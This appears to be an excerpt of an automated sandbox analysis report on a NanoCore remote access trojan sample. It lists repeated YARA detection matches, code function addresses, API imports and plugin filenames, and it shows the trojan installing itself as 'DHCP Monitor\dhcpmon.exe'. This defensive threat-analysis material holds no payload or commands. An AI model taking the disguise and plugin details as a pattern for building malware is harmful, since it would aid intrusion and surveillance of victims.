      Source: 10.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.353e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.353e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.34731ec.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.334e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.334e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 12.2.dhcpmon.exe.1ed91458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.1ed91458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.715c48.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.715c48.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.5b31b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.5b31b8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 1_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 8_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 1_2_004046A7
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 2_2_0040A2A5
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 2_2_022CE471
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 2_2_022CE480
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 2_2_022CBBD4
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 2_2_051CF5F8
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 2_2_051C9788
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 8_2_004046A7
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 10_2_0040A2A5
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 10_2_022DE471
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 10_2_022DE480
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 10_2_022DBBD4
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 10_2_050DF5F8
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 10_2_050D9788
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 10_2_050DA5D0
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 10_2_05263E30
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 10_2_05264A50
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 10_2_05264B08
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: 10_1_0040A2A5
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 11_2_0040A2A5
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 11_2_0215E471
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 11_2_0215E480
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 11_2_0215BBD4
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 11_2_0508F5F8
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 11_2_05089788
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 11_2_0508A5D0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 11_2_0508A610
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 11_2_05253E30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 11_2_05254A50
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 11_2_05254B08
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 11_1_0040A2A5
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 13_2_0040A2A5
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 13_2_0499E480
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 13_2_0499E470
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 13_2_0499BBD4
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 13_2_051CF5F8
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 13_2_051C9788
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 13_2_051CA610
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 13_2_05393E30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 13_2_05394A50
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 13_2_05394B08
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: 13_1_0040A2A5
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: String function: 004059BF appears 34 times
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: String function: 00401ED0 appears 69 times
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: String function: 0040569E appears 54 times
      Source: C:\Users\user\Desktop\nanocore.exe, Code function: String function: 00402A9A appears 52 times
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: String function: 00401ED0 appears 92 times
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: String function: 004056B5 appears 32 times
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Code function: String function: 0040569E appears 72 times
      Source: nanocore.exe, 00000001.00000003.643905225.000000001F026000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs nanocore.exe
      Source: nanocore.exe, 00000002.00000002.909718958.00000000058E0000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameLzma#.dll4 vs nanocore.exe
      Source: nanocore.exe, 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs nanocore.exe
      Source: nanocore.exe, 00000002.00000002.909617684.00000000057B0000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemscorrc.dllT vs nanocore.exe
      Source: nanocore.exe, 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameClientPlugin.dll4 vs nanocore.exe
      Source: nanocore.exe, 00000002.00000002.909912427.0000000006530000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs nanocore.exe
      Source: nanocore.exe, 00000002.00000002.909495534.0000000005250000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameuser32j% vs nanocore.exe
      Source: nanocore.exe, 00000008.00000003.664138784.000000001F20F000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs nanocore.exe
      Source: nanocore.exe, 0000000A.00000002.684361480.0000000002510000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs nanocore.exe
      Source: nanocore.exe, 0000000A.00000002.684361480.0000000002510000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameClientPlugin.dll4 vs nanocore.exe
      Source: nanocore.exe, 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameLzma#.dll4 vs nanocore.exe
      Source: nanocore.exe, 0000000A.00000002.687348266.0000000005230000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameuser32j% vs nanocore.exe
      Source: nanocore.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.684555433.0000000002320000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.684361480.0000000002510000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.703677926.0000000002440000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
